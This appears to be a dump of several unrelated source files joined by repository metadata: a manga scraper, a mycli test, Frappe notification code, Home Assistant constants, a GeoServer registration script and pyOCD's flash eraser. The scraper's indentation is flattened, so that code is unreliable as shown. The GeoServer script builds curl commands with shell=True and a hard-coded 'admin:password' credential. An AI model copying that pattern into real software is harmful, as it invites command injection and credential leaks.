place_to_start_from_index = (int(search_input) - 1) #Subtract one for the option before
search_found_bool = True
break
else:
length_of_list = len(allChaps)
print('Your choice needs to be greater then 0 and less then ' + str(int(length_of_list)+1))
elif search_input == 'n':
print('\nThe next 50 manga:\n')
break
elif search_input == 'q':
search_quit_bool = True
break
elif search_input == 'l':
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit to the main menu\n')
else:
print('Invalid choice!')
print()
if search_found_bool:
break
if search_quit_bool:
break
#If there was something found and the user wants to end at a chapter
                #If the user quit, then this will just loop back to the beginning of the menu
if search_found_bool:
search_found_bool = False
search_quit_bool = False
while 1:
print('Do you wish to end the download at a certain chapter?[y/n] or [q] to quit.')
print('By Choosing no the entire manga will download from the start location')
continueChoiceCustomChap = input('')
print('\n')
if continueChoiceCustomChap == 'y':
while True:
print('Here is a list of the first 50 Chapters.')
print('Keep in mind you cannot go back')
                            print('You must select a number equal to or greater than ' + str(place_to_start_from_index + 1))
print('\tYour options are:')
                            print('The number of the chapter you want to end at')
print('\'n\' for the next 50 chapters')
print('\'q\' to quit and download until the end of the manga\n')
for i in range(len(allChaps)):
#This code block is to extract the Vol and Chapter numbers
#From the URL. It is a pain but needed.
#This code block is also used later on.
skipBool1 = False
skipBool2 = False
volChapDirectoryString = ""
findVolume = re.findall(r'v\d{2}.\d+' , allChaps[i])
findChap = re.findall(r'c\d{3}.\d+' , allChaps[i])
if len(findVolume) == 0:
findVolume = re.findall(r'v\d{2}', allChaps[i])
try:
volTempString = re.findall(r'\d{2}', findVolume[0])
except:
skipBool1 = True
if skipBool1 == False:
volTempString = str(int(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
else:
volTempString = re.findall(r'\d{2}.\d+', findVolume[-1])
volTempString = str(float(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
if len(findChap) == 0:
findChap = re.findall(r'c\d{3}', allChaps[i])
try:
chapTempString = re.findall(r'\d{3}', findChap[0])
except:
skipBool2 = True
if skipBool2 == False:
chapTempString = str(int(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
else:
chapTempString = re.findall(r'\d{3}.\d+', findChap[-1])
chapTempString = str(float(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
if volChapDirectoryString == "":
                                    print('An error has occurred getting chapter or volume number!')
return
#Plus one here So there will be a minus one later!!!
print('Number ' + str(i+1) + ' ' + volChapDirectoryString)
if i % 50 == 49 or (i == (len(allChaps) - 1)):
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit and download until the end of the manga\n')
while True:
print('Choose:')
search_input = input('')
print('\n')
if search_input.isdigit():
if int(search_input) >= (place_to_start_from_index + 1) and int(search_input) <= len(allChaps):
custom_end = True
place_to_end_at_index = (int(search_input) - 1) #Subtract one for the option before
search_found_bool = True
break
else:
length_of_list = len(allChaps)
print('Your choice needs to be greater then ' + str(place_to_start_from_index + 1) + ' and less then ' + str(int(length_of_list)+1))
elif search_input == 'n':
print('\nThe next 50 manga:\n')
break
elif search_input == 'q':
search_quit_bool = True
break
elif search_input == 'l':
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit and download until the end of the manga\n')
else:
print('Invalid choice!')
print()
if search_found_bool:
break
if search_quit_bool:
break
if custom_start or custom_end:
break
if custom_start or custom_end:
break
elif continueChoiceCustomChap == 'n':
break
elif continueChoiceCustomChap == 'q':
return
else:
print('Invalid Option!')
                        #At this point there is a guaranteed start
                        #There may be an end chapter, but if the user quit then custom_end will be false
                        #and the manga will download from the start until the absolute end of the manga
break
else:
print('No chapter Detected. Please try again.\n\n')
#After if statement
elif continueChoiceFullDownload == 'y':
fullDownload = True
break
elif continueChoiceFullDownload == 'q':
return
else:
print('Invalid Option!')
#
#
if fullDownload == True:
pass
#If you only have a start location, pop off chapter numbers/links until you hit that chapter
elif custom_start == True and custom_end == False:
for i in range(place_to_start_from_index):
allChaps.pop(0)
            #Do the same as before, but the end must be popped off as well:
            #drop every chapter after the chosen end chapter from the tail of the list.
elif custom_start == True and custom_end == True:
for i in range(place_to_start_from_index):
allChaps.pop(0)
for i in range(len(allChaps)-(int(place_to_end_at_index)-int(place_to_start_from_index))-1):
allChaps.pop(-1)
else:
print('Fatal error with the start selection')
return
#
if platformType == 'Windows':
directoryName = directoryName + "\\" + directorySafeName
else:
directoryName = directoryName + "/" + directorySafeName
try:
os.makedirs(directoryName)
except OSError:
if not os.path.isdir(directoryName):
raise
os.chdir(directoryName)
for i in allChaps:
skipBool1 = False
skipBool2 = False
firstLoop = True
currentPage = 0
volChapDirectoryString = ""
findVolume = re.findall(r'v\d{2}.\d+' , i)
findChap = re.findall(r'c\d{3}.\d+' , i)
if len(findVolume) == 0:
findVolume = re.findall(r'v\d{2}', i)
try:
volTempString = re.findall(r'\d{2}', findVolume[0])
except:
skipBool1 = True
if skipBool1 == False:
volTempString = str(int(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
else:
volTempString = re.findall(r'\d{2}.\d+', findVolume[-1])
volTempString = str(float(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
if len(findChap) == 0:
findChap = re.findall(r'c\d{3}', i)
try:
chapTempString = re.findall(r'\d{3}', findChap[0])
except:
skipBool2 = True
if skipBool2 == False:
chapTempString = str(int(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
else:
chapTempString = re.findall(r'\d{3}.\d+', findChap[-1])
chapTempString = str(float(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
if volChapDirectoryString == "":
                print('An error has occurred getting chapter or volume number!')
return
print('Downloading', volChapDirectoryString)
if platformType == 'Windows':
volChapDirectoryName = directoryName + "\\" + volChapDirectoryString
else:
volChapDirectoryName = directoryName + "/" + volChapDirectoryString
try:
os.makedirs(volChapDirectoryName)
except OSError:
if not os.path.isdir(volChapDirectoryName):
raise
os.chdir(volChapDirectoryName)
urllibIMG = str(urllib.request.urlopen(i).read())
trimHTML = re.findall('<select id="top_chapter_list"(.*?)read_img', urllibIMG)
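                #Collect the page URLs for this chapter from the <option> values on its first page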
try:
allPageURLs = re.findall('<option value="(.*?)" ', trimHTML[-1])
except:
print('Something went wrong when trying to find the page URL\'s!')
print('This manga cannot be downloaded at this time.')
return
for k in allPageURLs:
currentPage += 1
skipPage = False
if firstLoop == False:
#urllibReq = urllib.request.Request(k, None, {}, None, True,'POST')
urllibReq = urllib.request.Request(k)
urllibReq.method = 'POST'
urllibIMG = str(urllib.request.urlopen(urllibReq).read())
if firstLoop == True:
firstLoop = False
numOfFileInCWD = len([name for name in os.listdir('.') if os.path.isfile(name)])
if numOfFileInCWD == len(allPageURLs):
break
print("Downloading Page %d" % currentPage, end="", flush=True)
print("\r", end="", flush=True)
#textFile = open("HTMLFile " + str(currentPage) + ".HTML", "w")
#textFile.write(urllibIMG)
#textFile.close()
imageURL = re.findall('<img src="(.*?)" onerror="', urllibIMG)
try:
extensionForIMG = re.findall('\.[a-z]{3}', imageURL[0])
except:
print('Page ' + str(currentPage) + ' could not be downloaded!')
skipPage = True
if skipPage == False:
imageName = "Page " + str(currentPage) + extensionForIMG[-1]
fileExists = os.path.isfile(imageName)
if fileExists == False:
try:
rawImage = urllib.request.urlopen(imageURL[0]).read()
fout = open(imageName, 'wb')
fout.write(rawImage)
fout.close()
except:
print(' ')
print("Image download Error!")
print('Volume/Chapter: ' + volChapDirectoryString + ' Page: ' + str(currentPage) + ' Cannot be downloaded.')
while True:
print('Do you want to download another manga from MangaHere?')
print('[y/n]')
Continue_or_not = input('')
if Continue_or_not == 'y':
break
elif Continue_or_not == 'n':
return
else:
print('Invalid choice!')
print()
return
def MangaStream():
success = False
currentDirectory = os.getcwd()
if platformType == 'Windows':
MASTERdirectoryName = currentDirectory + "\\MangaStream"
else:
MASTERdirectoryName = currentDirectory + "/Mangastream"
try:
os.makedirs(MASTERdirectoryName)
except OSError:
if not os.path.isdir(MASTERdirectoryName):
raise
#MASTERdirectoryName is the Variable that will keep the program downloading
#Different Manga to the same Mangastream Folder
os.chdir(MASTERdirectoryName)
while success == False:
downloadManga = False
print('To download from MangaStream you must input a URL.')
print('The URL you are to input below should be the top level page of the')
print('manga you wish to download')
print('Ex: http://mangastream.com/manga/one_piece ')
print()
print('Please enter the url of the manga you wish to download (or q to quit): ')
urlRequest = input('')
print('\n')
if urlRequest == 'q':
return
try:
urllibHTML = urllib.request.urlopen(urlRequest).read()
downloadManga = True
except:
print()
print('Invalid URL or connection time-out.')
if downloadManga == True:
Manga_Title = re.findall(r'<title>(.*?) Manga', str(urllibHTML))
if len(Manga_Title) == 0:
print("Title not found. URL or HTML Error.")
break
Manga_Title_string = Manga_Title[0]
Manga_Title_string = re.sub(r'\\x\w{2}', r' ', Manga_Title_string)
            #Python 3.4 Converts '&' Type things to their string equivalent.
Manga_Title_string = html.unescape(Manga_Title_string)
#Get rid of Non-Functioning characters for Filenames
directorySafeName = Manga_Title_string
directorySafeName = directorySafeName.replace("/", " over ")
directorySafeName = directorySafeName.replace(":", "")
directorySafeName = directorySafeName.replace("?", "")
directorySafeName = directorySafeName.replace("+", " plus ")
directorySafeName = directorySafeName.replace("\"","'")
directorySafeName = directorySafeName.replace("%", " Percent ")
directorySafeName = directorySafeName.replace("<", "")
directorySafeName = directorySafeName.replace(">", "")
Manga_Title_string = directorySafeName
all_chaps_list = re.findall('<th style="width: 70%">Chapter<\/th>\\\\n<th style="width: 30%">Released<\/th>\\\\n<\/tr>\\\\n<tr>\\\\n(.*?)<\/table>', str(urllibHTML), re.DOTALL)
all_chaps_str = all_chaps_list[0]
chapter_list_tuples = re.findall(r'href="(.*?)">(.*?)</a>', str(all_chaps_str))
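            #Each tuple is (chapter link, chapter title) pulled from the release table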
chapter_names = []
chapter_links = []
for i in range(len(chapter_list_tuples)):
chapter_links.append(chapter_list_tuples[i][0])
chapter_names.append(chapter_list_tuples[i][1])
#Start Manga Downloading
currentDirectory = MASTERdirectoryName
if platformType == 'Windows':
manga_directory_name = currentDirectory + "\\" + Manga_Title_string
else:
manga_directory_name = currentDirectory + "/" + Manga_Title_string
try:
os.makedirs(manga_directory_name)
except OSError:
if not os.path.isdir(manga_directory_name):
raise
os.chdir(manga_directory_name)
for i in range(len(chapter_names)):
first_chapter_bool = True
chapter_link_string = chapter_links[i]
chapter_name_string = chapter_names[i]
chapDirectoryName = ''
chapter_name_string = re.sub(r'\\x\w{2}', r' ', chapter_name_string)
                #Python 3.4 Converts '&' Type things to their string equivalent.
#chapter_name_string = html.unescape(chapter_name_string)
#Get rid of Non-Functioning characters for Filenames
directorySafeName = chapter_name_string
directorySafeName = directorySafeName.replace("/", " over ")
directorySafeName = directorySafeName.replace(":", "")
directorySafeName = directorySafeName.replace("?", "")
directorySafeName = directorySafeName.replace("+", " plus ")
directorySafeName = directorySafeName.replace("\"", "'")
directorySafeName = directorySafeName.replace("\'", "'")
directorySafeName = directorySafeName.replace("\\'", "'")
directorySafeName = directorySafeName.replace("\\", "")
directorySafeName = directorySafeName.replace("%", " Percent ")
directorySafeName = directorySafeName.replace("<", "")
directorySafeName = directorySafeName.replace(">", "")
chapter_name_string = directorySafeName
if platformType == 'Windows':
chapDirectoryName = manga_directory_name + "\\Chapter " + chapter_name_string
else:
chapDirectoryName = manga_directory_name + "/Chapter " + chapter_name_string
try:
os.makedirs(chapDirectoryName)
except OSError:
if not os.path.isdir(chapDirectoryName):
raise
os.chdir(chapDirectoryName)
print("Downloading Chapter", chapter_name_string)
try:
urllibHTML = urllib.request.urlopen(chapter_link_string).read()
except:
print('Chapter Link Request Failed.')
print('HTML/Site Error')
return
page_list_raw = re.findall(r'<ul class="dropdown-menu">(.*?)</ul>', str(urllibHTML), re.DOTALL)
page_list_string = page_list_raw[-1]
list_of_some_of_the_pages = re.findall(r'href="(.*?)">', str(page_list_string))
final_page = list_of_some_of_the_pages[-1]
number_of_pages_list = re.findall(r'http://readms.com/r/.*?/\S+/\S+/(\d+)', final_page)
number_of_pages = int(number_of_pages_list[0])
chapter_url_list = re.findall(r'(http://readms.com/r/.*?/\S+/\S+/)\d+', final_page)
chapter_url = chapter_url_list[0]
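                #The last dropdown entry is the final page; its trailing number gives the page count and its prefix the chapter's base URL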
for j in range(number_of_pages):
if j == 0:
numOfFileInCWD = len([name for name in os.listdir('.') if os.path.isfile(name)])
if numOfFileInCWD == number_of_pages:
break
print("Downloading Page %d" % (j+1), end="", flush=True)
print("\r", end="", flush=True)
if first_chapter_bool:
first_chapter_bool = False
page_urllibHTML = urllibHTML
else:
try:
page_urllibHTML = urllib.request.urlopen(chapter_url + str(j+1)).read()
except:
print('Page link Request Failed.')
print('HTML/Site Error')
image_file_name_list = re.findall(r'<img id="manga-page" src="(.*?)"/></a>', str(page_urllibHTML))
image_file_name = image_file_name_list[0]
#CHECK EXTENSION. Mangastream Could use .png or .jpg or .jpeg
image_file_extension_list = re.findall(r'(\.\D[^\.]+)', image_file_name)
image_file_extension = image_file_extension_list[-1]
imageName = "Page " + str(j+1) + image_file_extension
fileExists = os.path.isfile(imageName)
#If file does not already exist, opens a file, writes image binary data to it and closes
if fileExists == False:
try:
rawImage = urllib.request.urlopen(image_file_name).read()
fout = open(imageName, 'wb')
fout.write(rawImage)
fout.close()
except:
print('Image download Request Failed.')
print('HTML/Site Error')
print('Image skipped to next image/page\n')
while 1:
print('\n')
print('Do you wish to download another manga?[y/n]')
continueChoice = input('')
if continueChoice == 'y':
break
elif continueChoice == 'n':
success = True
break
else:
print('Invalid Option!')
return
def Main():
print('\t\tWelcome to MangaMine!')
site_input = 'y'
MAIN_currentDirectory = os.getcwd()
while True:
if site_input == 'y':
print('Which manga site do you want to download from?')
print('Choose a number:', end='\n\n')
print('1. MangaStream')
print('2. MangaPanda')
print('3. MangaHere', end='\n\n')
#print('4. Batoto', end='\n\n')
while True:
site_input = input()
print()
if site_input == '1':
MangaStream()
break
elif site_input == '2':
MangaPanda()
break
elif site_input == '3':
MangaHere()
break
#elif site_input == '4':
# Batoto()
# break
else:
print('Invalid Input.')
print('Choose a number:', end='\n\n')
print('1. MangaStream')
print('2. MangaPanda')
print('3. MangaHere', end='\n\n')
#print('4. Batoto', end='\n\n')
elif site_input == 'n':
print('Goodbye.')
break
else:
print('Invalid input.')
os.chdir(MAIN_currentDirectory)
print('Do you want to download from another manga site? [y/n]')
site_input = input()
print()
site_input = site_input.lower()
#End of While Loop
#End of main
Main()
time.sleep(15)
| gpl-2.0 | 108,732,882,995,455,120 | 41.398062 | 189 | 0.431045 | false |
nkhuyu/mycli | tests/test_naive_completion.py | 14 | 1657 | from __future__ import unicode_literals
import pytest
from prompt_toolkit.completion import Completion
from prompt_toolkit.document import Document
@pytest.fixture
def completer():
import mycli.sqlcompleter as sqlcompleter
return sqlcompleter.SQLCompleter(smart_completion=False)
@pytest.fixture
def complete_event():
from mock import Mock
return Mock()
def test_empty_string_completion(completer, complete_event):
text = ''
position = 0
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set(map(Completion, completer.all_completions))
def test_select_keyword_completion(completer, complete_event):
text = 'SEL'
position = len('SEL')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set([Completion(text='SELECT', start_position=-3)])
def test_function_name_completion(completer, complete_event):
text = 'SELECT MA'
position = len('SELECT MA')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set([
Completion(text='MAX', start_position=-2),
Completion(text='MAXEXTENTS', start_position=-2)])
def test_column_name_completion(completer, complete_event):
text = 'SELECT FROM users'
position = len('SELECT ')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set(map(Completion, completer.all_completions))
| bsd-3-clause | 3,624,417,064,897,019,000 | 33.520833 | 72 | 0.702474 | false |
saurabh6790/frappe | frappe/desk/doctype/notification_log/notification_log.py | 1 | 4285 | # -*- coding: utf-8 -*-
# Copyright (c) 2019, Frappe Technologies and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.document import Document
from frappe.desk.doctype.notification_settings.notification_settings import (is_notifications_enabled, is_email_notifications_enabled_for_type, set_seen_value)
class NotificationLog(Document):
def after_insert(self):
frappe.publish_realtime('notification', after_commit=True, user=self.for_user)
set_notifications_as_unseen(self.for_user)
if is_email_notifications_enabled_for_type(self.for_user, self.type):
send_notification_email(self)
def get_permission_query_conditions(for_user):
if not for_user:
for_user = frappe.session.user
if for_user == 'Administrator':
return
return '''(`tabNotification Log`.for_user = '{user}')'''.format(user=for_user)
def get_title(doctype, docname, title_field=None):
if not title_field:
title_field = frappe.get_meta(doctype).get_title_field()
title = docname if title_field == "name" else \
frappe.db.get_value(doctype, docname, title_field)
return title
def get_title_html(title):
return '<b class="subject-title">{0}</b>'.format(title)
def enqueue_create_notification(users, doc):
'''
During installation of new site, enqueue_create_notification tries to connect to Redis.
This breaks new site creation if Redis server is not running.
We do not need any notifications in fresh installation
'''
if frappe.flags.in_install:
return
doc = frappe._dict(doc)
if isinstance(users, str):
users = [user.strip() for user in users.split(',') if user.strip()]
users = list(set(users))
frappe.enqueue(
'frappe.desk.doctype.notification_log.notification_log.make_notification_logs',
doc=doc,
users=users,
now=frappe.flags.in_test
)
def make_notification_logs(doc, users):
from frappe.social.doctype.energy_point_settings.energy_point_settings import is_energy_point_enabled
for user in users:
if frappe.db.exists('User', {"email": user, "enabled": 1}):
if is_notifications_enabled(user):
if doc.type == 'Energy Point' and not is_energy_point_enabled():
return
_doc = frappe.new_doc('Notification Log')
_doc.update(doc)
_doc.for_user = user
if _doc.for_user != _doc.from_user or doc.type == 'Energy Point' or doc.type == 'Alert':
_doc.insert(ignore_permissions=True)
def send_notification_email(doc):
if doc.type == 'Energy Point' and doc.email_content is None:
return
from frappe.utils import get_url_to_form, strip_html
doc_link = get_url_to_form(doc.document_type, doc.document_name)
header = get_email_header(doc)
email_subject = strip_html(doc.subject)
frappe.sendmail(
recipients = doc.for_user,
subject = email_subject,
template = "new_notification",
args = {
'body_content': doc.subject,
'description': doc.email_content,
'document_type': doc.document_type,
'document_name': doc.document_name,
'doc_link': doc_link
},
header = [header, 'orange'],
now=frappe.flags.in_test
)
def get_email_header(doc):
docname = doc.document_name
header_map = {
'Default': _('New Notification'),
'Mention': _('New Mention on {0}').format(docname),
'Assignment': _('Assignment Update on {0}').format(docname),
'Share': _('New Document Shared {0}').format(docname),
'Energy Point': _('Energy Point Update on {0}').format(docname),
}
return header_map[doc.type or 'Default']
@frappe.whitelist()
def mark_all_as_read():
unread_docs_list = frappe.db.get_all('Notification Log', filters = {'read': 0, 'for_user': frappe.session.user})
unread_docnames = [doc.name for doc in unread_docs_list]
if unread_docnames:
filters = {'name': ['in', unread_docnames]}
frappe.db.set_value('Notification Log', filters, 'read', 1, update_modified=False)
@frappe.whitelist()
def mark_as_read(docname):
if docname:
frappe.db.set_value('Notification Log', docname, 'read', 1, update_modified=False)
@frappe.whitelist()
def trigger_indicator_hide():
frappe.publish_realtime('indicator_hide', user=frappe.session.user)
def set_notifications_as_unseen(user):
try:
frappe.db.set_value('Notification Settings', user, 'seen', 0)
except frappe.DoesNotExistError:
return
| mit | 6,160,874,969,101,730,000 | 30.740741 | 159 | 0.715519 | false |
PetePriority/home-assistant | homeassistant/components/google_assistant/const.py | 2 | 1493 | """Constants for Google Assistant."""
DOMAIN = 'google_assistant'
GOOGLE_ASSISTANT_API_ENDPOINT = '/api/google_assistant'
CONF_EXPOSE = 'expose'
CONF_ENTITY_CONFIG = 'entity_config'
CONF_EXPOSE_BY_DEFAULT = 'expose_by_default'
CONF_EXPOSED_DOMAINS = 'exposed_domains'
CONF_PROJECT_ID = 'project_id'
CONF_ALIASES = 'aliases'
CONF_API_KEY = 'api_key'
CONF_ROOM_HINT = 'room'
CONF_ALLOW_UNLOCK = 'allow_unlock'
DEFAULT_EXPOSE_BY_DEFAULT = True
DEFAULT_EXPOSED_DOMAINS = [
'climate', 'cover', 'fan', 'group', 'input_boolean', 'light',
'media_player', 'scene', 'script', 'switch', 'vacuum', 'lock',
]
DEFAULT_ALLOW_UNLOCK = False
PREFIX_TYPES = 'action.devices.types.'
TYPE_LIGHT = PREFIX_TYPES + 'LIGHT'
TYPE_SWITCH = PREFIX_TYPES + 'SWITCH'
TYPE_VACUUM = PREFIX_TYPES + 'VACUUM'
TYPE_SCENE = PREFIX_TYPES + 'SCENE'
TYPE_FAN = PREFIX_TYPES + 'FAN'
TYPE_THERMOSTAT = PREFIX_TYPES + 'THERMOSTAT'
TYPE_LOCK = PREFIX_TYPES + 'LOCK'
SERVICE_REQUEST_SYNC = 'request_sync'
HOMEGRAPH_URL = 'https://homegraph.googleapis.com/'
REQUEST_SYNC_BASE_URL = HOMEGRAPH_URL + 'v1/devices:requestSync'
# Error codes used for SmartHomeError class
# https://developers.google.com/actions/smarthome/create-app#error_responses
ERR_DEVICE_OFFLINE = "deviceOffline"
ERR_DEVICE_NOT_FOUND = "deviceNotFound"
ERR_VALUE_OUT_OF_RANGE = "valueOutOfRange"
ERR_NOT_SUPPORTED = "notSupported"
ERR_PROTOCOL_ERROR = 'protocolError'
ERR_UNKNOWN_ERROR = 'unknownError'
ERR_FUNCTION_NOT_SUPPORTED = 'functionNotSupported'
| apache-2.0 | -7,944,093,607,279,498,000 | 32.931818 | 76 | 0.732083 | false |
GeoGateway/GeoServer | scripts/batch_register_sample.py | 1 | 2792 |
"""batch register tiff with sytle
"""
import json
import os
import subprocess
import urllib.request
def main():
"""generate copy list"""
# geojson output from UAVSAR search API
jsonfile = "uavsar_ca.geojson"
with open(jsonfile, "r") as f:
data = json.loads(f.read())
datafolder1 = "/mnt/SGG/password_production/geotiff/"
datafolder2 = "/mnt/SGG/NAS/password/insar/geotiff/"
datafolder3 = "/home/geogateway/geotiff/"
for item in data:
uid = item['uid']
tiff = ""
if int(uid) >= 1000:
datadir = datafolder1
else:
if int(uid) <= 117:
datadir = datafolder3
else:
datadir = datafolder2
tiff += "uid_" + uid + "/" + "uid" + uid + "_unw.tiff"
if int(uid) <= 117:
tiff = "uid" + uid + "_unw.tiff"
layername = "uid" + uid + "_unw"
print("register", tiff)
geoserver = "http://127.0.0.1:8080/geoserver/InSAR/wms?version=1.1.1&request=DescribeLayer&outputFormat=application/json&exceptions=application/json"
queryurl = geoserver + "&layers="+"InSAR:"+layername
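        # DescribeLayer returns an exception document if the layer is not registered yet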
with urllib.request.urlopen(queryurl) as x:
rawtext = x.read().decode('utf8')
x.close
# response = urllib2.urlopen(queryurl)
# json_output = response.read()
json_output = rawtext
if "exceptions" in json_output:
# not registered
tiff = datadir + tiff
coverage = layername
print(tiff, coverage)
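            # Create a GeoTIFF coverage store for this layer in the InSAR workspace via the GeoServer REST API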
cmd = "curl -u admin:password -v -XPOST -H 'Content-type: application/xml' -d '<coverageStore> <name>" + coverage + "</name><workspace>InSAR</workspace><enabled>true</enabled><type>GeoTIFF</type></coverageStore>' \"http://127.0.0.1:8080/geoserver/rest/workspaces/InSAR/coveragestores\""
#print(cmd)
subprocess.call(cmd, shell=True)
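            # Point the new store at the external GeoTIFF and publish it as a coverage layer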
cmd = "curl -u admin:password -v -XPUT -H 'Content-type: text/plain' -d 'file:" + tiff + "' \"http://127.0.0.1:8080/geoserver/rest/workspaces/InSAR/coveragestores/" + coverage + "/external.geotiff?configure=first\&coverageName=" + coverage + "\""
#print(cmd)
subprocess.call(cmd, shell=True)
            # change default style
defaultstyle = layername + "_default"
cmd = 'curl -v -u admin:password -XPUT -H "Content-type: text/xml" -d "<layer><defaultStyle><name>InSAR:%s</name></defaultStyle></layer>" http://127.0.0.1:8080/geoserver/rest/layers/InSAR:%s'
cmd = cmd % (defaultstyle, coverage)
#print(cmd)
subprocess.call(cmd, shell=True)
else:
print("already registered: ", uid)
continue
if __name__ == '__main__':
main()
| apache-2.0 | -7,177,346,655,251,294,000 | 36.226667 | 298 | 0.579871 | false |
mbedmicro/pyOCD | pyocd/flash/eraser.py | 1 | 7129 | # pyOCD debugger
# Copyright (c) 2018-2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from enum import Enum
import six
from ..core.memory_map import MemoryType
from ..core import exceptions
from ..utility.progress import print_progress
LOG = logging.getLogger(__name__)
class FlashEraser(object):
"""! @brief Class that manages high level flash erasing.
Can erase a target in one of three modes:
- chip erase: Erase all flash on the target.
- mass erase: Also erase all flash on the target. However, on some targets, a mass erase has
special properties such as unlocking security or erasing additional configuration regions
that are not erased by a chip erase. If a target does not have a special mass erase, then
it simply reverts to a chip erase.
- sector erase: One or more sectors are erased.
"""
class Mode(Enum):
MASS = 1
CHIP = 2
SECTOR = 3
def __init__(self, session, mode):
"""! @brief Constructor.
@param self
@param session The session instance.
@param mode One of the FlashEraser.Mode enums to select mass, chip, or sector erase.
"""
self._session = session
self._mode = mode
def erase(self, addresses=None):
"""! @brief Perform the type of erase operation selected when the object was created.
For sector erase mode, an iterable of sector addresses specifications must be provided via
the _addresses_ parameter. The address iterable elements can be either strings, tuples,
or integers. Tuples must have two elements, the start and end addresses of a range to erase.
Integers are simply an address within the single page to erase.
String address specifications may be in one of three formats: "<address>", "<start>-<end>",
or "<start>+<length>". Each field denoted by angled brackets is an integer literal in
either decimal or hex notation.
Examples:
- "0x1000" - erase the one sector at 0x1000
- "0x1000-0x4fff" - erase sectors from 0x1000 up to but not including 0x5000
- "0x8000+0x800" - erase sectors starting at 0x8000 through 0x87ff
@param self
@param addresses List of addresses or address ranges of the sectors to erase.
"""
if self._mode == self.Mode.MASS:
self._mass_erase()
elif self._mode == self.Mode.CHIP:
self._chip_erase()
elif self._mode == self.Mode.SECTOR and addresses:
self._sector_erase(addresses)
else:
LOG.warning("No operation performed")
def _mass_erase(self):
LOG.info("Mass erasing device...")
if self._session.target.mass_erase():
LOG.info("Successfully erased.")
else:
LOG.error("Mass erase failed.")
def _chip_erase(self):
LOG.info("Erasing chip...")
# Erase all flash regions. This may be overkill if either each region's algo erases
# all regions on the chip. But there's no current way to know whether this will happen,
# so prefer to be certain.
for region in self._session.target.memory_map.iter_matching_regions(type=MemoryType.FLASH):
if region.flash is not None:
if region.flash.is_erase_all_supported:
region.flash.init(region.flash.Operation.ERASE)
region.flash.erase_all()
region.flash.cleanup()
else:
self._sector_erase([(region.start, region.end)])
LOG.info("Done")
def _sector_erase(self, addresses):
flash = None
currentRegion = None
for spec in addresses:
# Convert the spec into a start and end address.
sector_addr, end_addr = self._convert_spec(spec)
while sector_addr < end_addr:
# Look up the flash memory region for the current address.
region = self._session.target.memory_map.get_region_for_address(sector_addr)
if region is None:
LOG.warning("address 0x%08x is not within a memory region", sector_addr)
break
if not region.is_flash:
LOG.warning("address 0x%08x is not in flash", sector_addr)
break
# Handle switching regions.
if region is not currentRegion:
# Clean up previous flash.
if flash is not None:
flash.cleanup()
currentRegion = region
flash = region.flash
flash.init(flash.Operation.ERASE)
assert flash is not None
# Get sector info for the current address.
sector_info = flash.get_sector_info(sector_addr)
assert sector_info, ("sector address 0x%08x within flash region '%s' is invalid"
% (sector_addr, region.name))
# Align first page address.
delta = sector_addr % sector_info.size
if delta:
LOG.warning("sector address 0x%08x is unaligned", sector_addr)
sector_addr -= delta
# Erase this page.
LOG.info("Erasing sector 0x%08x (%d bytes)", sector_addr, sector_info.size)
flash.erase_sector(sector_addr)
sector_addr += sector_info.size
if flash is not None:
flash.cleanup()
def _convert_spec(self, spec):
if isinstance(spec, six.string_types):
# Convert spec from string to range.
if '-' in spec:
a, b = spec.split('-')
page_addr = int(a, base=0)
end_addr = int(b, base=0)
elif '+' in spec:
a, b = spec.split('+')
page_addr = int(a, base=0)
length = int(b, base=0)
end_addr = page_addr + length
else:
page_addr = int(spec, base=0)
end_addr = page_addr + 1
elif isinstance(spec, tuple):
page_addr = spec[0]
end_addr = spec[1]
else:
page_addr = spec
end_addr = page_addr + 1
return page_addr, end_addr
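if __name__ == '__main__':
    # Minimal usage sketch, not part of the pyOCD API surface: it assumes a
    # debug probe is attached and that ConnectHelper is available as in
    # current pyOCD releases.
    from pyocd.core.helpers import ConnectHelper
    with ConnectHelper.session_with_chosen_probe() as session:
        eraser = FlashEraser(session, FlashEraser.Mode.SECTOR)
        # Erase the sector containing 0x1000 and the range 0x8000..0x87ff.
        eraser.erase(["0x1000", "0x8000+0x800"])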
| apache-2.0 | -8,523,969,503,809,062,000 | 39.276836 | 100 | 0.573573 | false |
linuxdeepin/deepin-media-player | src/plugins/plugin_youku.py | 1 | 9055 | #! /usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2013 XXX, Inc.
# 2013 红铭曼,王芳
#
# Author: 红铭曼,王芳 <[email protected]>
# Maintainer: 红铭曼,王芳 <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
